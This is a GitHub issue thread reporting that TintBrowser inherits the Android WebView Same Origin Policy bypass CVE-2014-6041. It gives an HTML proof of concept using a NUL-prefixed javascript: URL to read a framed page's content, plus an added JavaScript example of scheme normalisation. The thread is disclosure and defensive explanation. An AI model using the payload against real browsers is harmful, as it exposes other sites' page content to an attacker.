TintBrowser
Same Origin Policy bypass (CVE-2014-6041)
Tint is vulnerable to http://www.cvedetails.com/cve/CVE-2014-6041/
Summary: "The Android Browser application 4.2.1 on Android allows remote attackers to bypass the Same Origin Policy via a crafted attribute containing a \u0000 character, as demonstrated by an onclick="window.open('\u0000javascript: sequence."
Tint is affected too. Does it use the Android Browser engine?
You can check it at http://ejj.io/SOP.php
The source of the page is
<html>
<head>
</head>
<body>
<iframe name="testwindow" src="http://snudey.com"></iframe>
<input type=button value="test"
onclick="window.open('\u0000javascript:alert(document.body.innerHTML)','testwindow')" >
</body>
</html>
It shouldn't be possible to access document.body.innerHTML from outside the iframe, but it is. Unfortunately I have to stop using Tint until this issue is fixed.
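Why the leading \u0000 matters, as an added illustration that is not part of this issue thread: a URL parser strips leading C0 control characters (including NUL) before reading the scheme, so "\u0000javascript:..." is handled as a javascript: URL, while a filter that only looks at the raw string prefix never sees "javascript:". The helper below (function names are my own, inputs constructed) normalises the same way before checking the scheme.

```javascript
// Added example (not from the TintBrowser issue or project): a raw-prefix
// filter versus a scheme check applied after URL-style normalisation.

// Schemes that run script in the frame they are opened in.
const SCRIPT_SCHEMES = new Set(["javascript", "vbscript"]);

// Naive filter: compares the raw string. "\u0000javascript:..." does not
// start with "javascript:", so it is wrongly treated as harmless.
function naiveIsScriptUrl(url) {
  return String(url).toLowerCase().startsWith("javascript:");
}

// Normalisation in the spirit of the WHATWG URL parser: strip leading and
// trailing C0 controls and spaces (U+0000..U+0020), then drop ASCII tab,
// LF and CR anywhere in the string. This happens before the scheme is read.
function normalizeForScheme(url) {
  return String(url)
    .replace(/^[\u0000-\u0020]+|[\u0000-\u0020]+$/g, "")
    .replace(/[\t\n\r]/g, "");
}

// Scheme of the normalised URL (text before the first ':'), lower-cased,
// or null when the input carries no scheme at all.
function schemeOf(url) {
  const m = /^([a-z][a-z0-9+.-]*):/i.exec(normalizeForScheme(url));
  return m ? m[1].toLowerCase() : null;
}

// Hardened check: decide on the normalised scheme, not the raw prefix.
function isScriptUrl(url) {
  const scheme = schemeOf(url);
  return scheme !== null && SCRIPT_SCHEMES.has(scheme);
}

// Constructed inputs; the first mirrors the string form in the PoC above.
const SAMPLES = [
  "\u0000javascript:alert(document.body.innerHTML)",
  " JavaScript:void(0)",
  "java\nscript:void(0)",
  "https://example.com/",
];

for (const u of SAMPLES) {
  console.log(JSON.stringify(u), "naive:", naiveIsScriptUrl(u), "hardened:", isScriptUrl(u));
}
```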
Tint uses the WebView component from the Android SDK, which I believe is the same as the stock browser. So the issue can only be fixed through an Android update.
Sorry about that.
2014-09-16 9:27 GMT+02:00 Paolo Montrasio [email protected]:
— Reply to this email directly or view it on GitHub https://github.com/Anasthase/TintBrowser/issues/79.